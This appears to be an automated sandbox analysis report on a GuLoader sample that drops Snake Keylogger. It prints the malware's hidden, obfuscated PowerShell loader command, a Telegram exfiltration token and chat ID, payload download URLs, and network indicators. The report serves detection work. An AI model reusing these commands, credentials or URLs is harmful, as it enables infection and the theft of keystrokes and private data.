Edit tour

Windows Analysis Report
Overheaped237.exe

Overview

General Information

Sample name:	Overheaped237.exe
Analysis ID:	1578145
MD5:	8f4adfd3b8c55670a99389ba3905e43d
SHA1:	24e4a66a55b65fe58933ac92b161befc5c5df977
SHA256:	8126f3d67e43f2c93f178b68cc6a791a61c7f4f986cd5fb0d213780c4aa8e2d4
Tags:	exeuser-TeamDreier
Infos:

Detection

GuLoader, Snake Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Early bird code injection technique detected

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected GuLoader

Yara detected Snake Keylogger

AI detected suspicious sample

Found suspicious powershell code related to unpacking or dynamic code loading

Loading BitLocker PowerShell Module

Machine Learning detection for sample

Queues an APC in another process (thread injection)

Suspicious powershell command line found

Tries to detect the country of the analysis system (by using the IP)

Writes to foreign memory regions

Abnormal high CPU Usage

Contains functionality for read data from the clipboard

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

Queries the volume information (name, serial number etc) of a device

Sigma detected: Msiexec Initiated Connection

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Classification

Process Tree

System is w10x64

Overheaped237.exe (PID: 1920 cmdline: "C:\Users\user\Desktop\Overheaped237.exe" MD5: 8F4ADFD3B8C55670A99389BA3905E43D)

powershell.exe (PID: 6256 cmdline: powershell.exe -windowstyle hidden "$Circumcorneal=gc -raw 'C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Deinos253\Ekstensives.Bnd';$Liturgiernes=$Circumcorneal.SubString(18059,3);.$Liturgiernes($Circumcorneal) " MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 3624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

msiexec.exe (PID: 1912 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Token": "7745751910:AAGY46QDCTWO_Pw9iDqZhkNij-i4uwbMgzE", "Chat_id": "7695061973", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000007.00000002.2681540329.0000000024E01000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000002.00000002.2079055968.000000000CA7F000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security

Sigma Signatures

Sigma detected: Msiexec Initiated Connection

Source: Network Connection

Author: frack113: Data: DestinationIp: 216.58.208.238, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 1912, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49710

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -windowstyle hidden "$Circumcorneal=gc -raw 'C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Deinos253\Ekstensives.Bnd';$Liturgiernes=$Circumcorneal.SubString(18059,3);.$Liturgiernes($Circumcorneal) ", CommandLine: powershell.exe -windowstyle hidden "$Circumcorneal=gc -raw 'C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Deinos253\Ekstensives.Bnd';$Liturgiernes=$Circumcorneal.SubString(18059,3);.$Liturgiernes($Circumcorneal) ", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Overheaped237.exe", ParentImage: C:\Users\user\Desktop\Overheaped237.exe, ParentProcessId: 1920, ParentProcessName: Overheaped237.exe, ProcessCommandLine: powershell.exe -windowstyle hidden "$Circumcorneal=gc -raw 'C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Deinos253\Ekstensives.Bnd';$Liturgiernes=$Circumcorneal.SubString(18059,3);.$Liturgiernes($Circumcorneal) ", ProcessId: 6256, ProcessName: powershell.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-19T10:30:19.735953+0100	2803305	3	Unknown Traffic	192.168.2.7	49714	104.21.67.152	443	TCP
2024-12-19T10:30:23.921941+0100	2803305	3	Unknown Traffic	192.168.2.7	49716	104.21.67.152	443	TCP
2024-12-19T10:30:26.956409+0100	2803305	3	Unknown Traffic	192.168.2.7	49718	104.21.67.152	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-19T10:30:12.683010+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49712	158.101.44.242	80	TCP
2024-12-19T10:30:18.120569+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49712	158.101.44.242	80	TCP
2024-12-19T10:30:22.058136+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49715	158.101.44.242	80	TCP

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-19T10:29:54.327758+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	49710	216.58.208.238	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000007.00000002.2681540329.0000000024E01000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "7745751910:AAGY46QDCTWO_Pw9iDqZhkNij-i4uwbMgzE", "Chat_id": "7695061973", "Version": "4.4"}

Multi AV Scanner detection for submitted file

Source: Overheaped237.exe	Virustotal: Detection: 15%			Perma Link
Source: Overheaped237.exe	ReversingLabs: Detection: 23%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 96.0% probability

Machine Learning detection for sample

Source: Overheaped237.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: Overheaped237.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.7:49713 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.7:49714 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 216.58.208.238:443 -> 192.168.2.7:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.17.65:443 -> 192.168.2.7:49711 version: TLS 1.2

Source: Overheaped237.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: indows\System.Core.pdb source: powershell.exe, 00000002.00000002.2072840579.0000000006D45000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb122658-3693405117-2476756634-1003_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000002.00000002.2072840579.0000000006C99000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: indows\System.Core.pdb* source: powershell.exe, 00000002.00000002.2072840579.0000000006D45000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\Overheaped237.exe	Code function: 0_2_00406167 FindFirstFileA,FindClose,	0_2_00406167
Source: C:\Users\user\Desktop\Overheaped237.exe	Code function: 0_2_00405705 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	0_2_00405705
Source: C:\Users\user\Desktop\Overheaped237.exe	Code function: 0_2_00402688 FindFirstFileA,	0_2_00402688

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 104.21.67.152 104.21.67.152
Source: Joe Sandbox View	IP Address: 158.101.44.242 158.101.44.242

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49712 -> 158.101.44.242:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49715 -> 158.101.44.242:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49714 -> 104.21.67.152:443
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49710 -> 216.58.208.238:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49718 -> 104.21.67.152:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49716 -> 104.21.67.152:443

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1ql-PHtZ-qYYrMLrpLo0-Q9w-a0ERmx9M HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1ql-PHtZ-qYYrMLrpLo0-Q9w-a0ERmx9M&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.7:49713 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.7:49714 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1ql-PHtZ-qYYrMLrpLo0-Q9w-a0ERmx9M HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1ql-PHtZ-qYYrMLrpLo0-Q9w-a0ERmx9M&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: drive.google.com
Source: global traffic	DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org

Source: msiexec.exe, 00000007.00000002.2681540329.0000000024E01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: msiexec.exe, 00000007.00000002.2681540329.0000000024E01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: msiexec.exe, 00000007.00000002.2681540329.0000000024F73000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2681540329.0000000024F65000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2681540329.0000000024EB8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2681540329.0000000024FA3000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2681540329.0000000024F4A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: msiexec.exe, 00000007.00000002.2681540329.0000000024F73000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2681540329.0000000024F65000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2681540329.0000000024EB8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2681540329.0000000024FA3000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2681540329.0000000024EF6000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2681540329.0000000024EA9000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2681540329.0000000024F4A000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2681540329.0000000024F81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: msiexec.exe, 00000007.00000002.2681540329.0000000024E01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: msiexec.exe, 00000007.00000002.2682980095.0000000027151000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/EV
Source: Overheaped237.exe	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: Overheaped237.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000002.00000002.2070947673.00000000055C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.2060287042.00000000046B6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: msiexec.exe, 00000007.00000002.2681540329.0000000024F73000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2681540329.0000000024F65000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2681540329.0000000024F4A000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2681540329.0000000024ED0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.org
Source: powershell.exe, 00000002.00000002.2060287042.00000000046B6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000002.00000002.2060287042.0000000004561000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2681540329.0000000024E01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.2060287042.00000000046B6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: msiexec.exe, 00000007.00000002.2681540329.0000000024E01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: powershell.exe, 00000002.00000002.2060287042.00000000046B6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.2060287042.0000000004561000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000002.00000002.2060287042.00000000046B6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: msiexec.exe, 00000007.00000003.2269618999.00000000093C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: powershell.exe, 00000002.00000002.2070947673.00000000055C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.2070947673.00000000055C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.2070947673.00000000055C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: msiexec.exe, 00000007.00000002.2667128224.000000000930A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: msiexec.exe, 00000007.00000002.2667128224.000000000930A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/3
Source: msiexec.exe, 00000007.00000002.2680353671.00000000243A0000.00000004.00001000.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2667128224.000000000930A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1ql-PHtZ-qYYrMLrpLo0-Q9w-a0ERmx9M
Source: msiexec.exe, 00000007.00000003.2326052745.0000000009385000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2667128224.0000000009376000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/
Source: msiexec.exe, 00000007.00000003.2269618999.00000000093C9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2667128224.0000000009368000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1ql-PHtZ-qYYrMLrpLo0-Q9w-a0ERmx9M&export=download
Source: powershell.exe, 00000002.00000002.2060287042.00000000046B6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.2070947673.00000000055C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: msiexec.exe, 00000007.00000002.2681540329.0000000024F73000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2681540329.0000000024F65000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2681540329.0000000024EB8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2681540329.0000000024EF6000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2681540329.0000000024F4A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: msiexec.exe, 00000007.00000002.2681540329.0000000024EB8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: msiexec.exe, 00000007.00000002.2681540329.0000000024F4A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: msiexec.exe, 00000007.00000002.2681540329.0000000024F73000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2681540329.0000000024F65000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2681540329.0000000024EF6000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2681540329.0000000024F4A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
Source: msiexec.exe, 00000007.00000003.2269618999.00000000093C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: msiexec.exe, 00000007.00000003.2269618999.00000000093C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://translate.google.com/translate_a/element.js
Source: msiexec.exe, 00000007.00000003.2269618999.00000000093C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
Source: msiexec.exe, 00000007.00000003.2269618999.00000000093C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com/analytics.js
Source: msiexec.exe, 00000007.00000003.2269618999.00000000093C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: msiexec.exe, 00000007.00000003.2269618999.00000000093C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: msiexec.exe, 00000007.00000003.2269618999.00000000093C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: msiexec.exe, 00000007.00000003.2269618999.00000000093C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724

Source: unknown	HTTPS traffic detected: 216.58.208.238:443 -> 192.168.2.7:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.17.65:443 -> 192.168.2.7:49711 version: TLS 1.2

Source: C:\Users\user\Desktop\Overheaped237.exe

Code function: 0_2_004051BA GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_004051BA

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\Overheaped237.exe

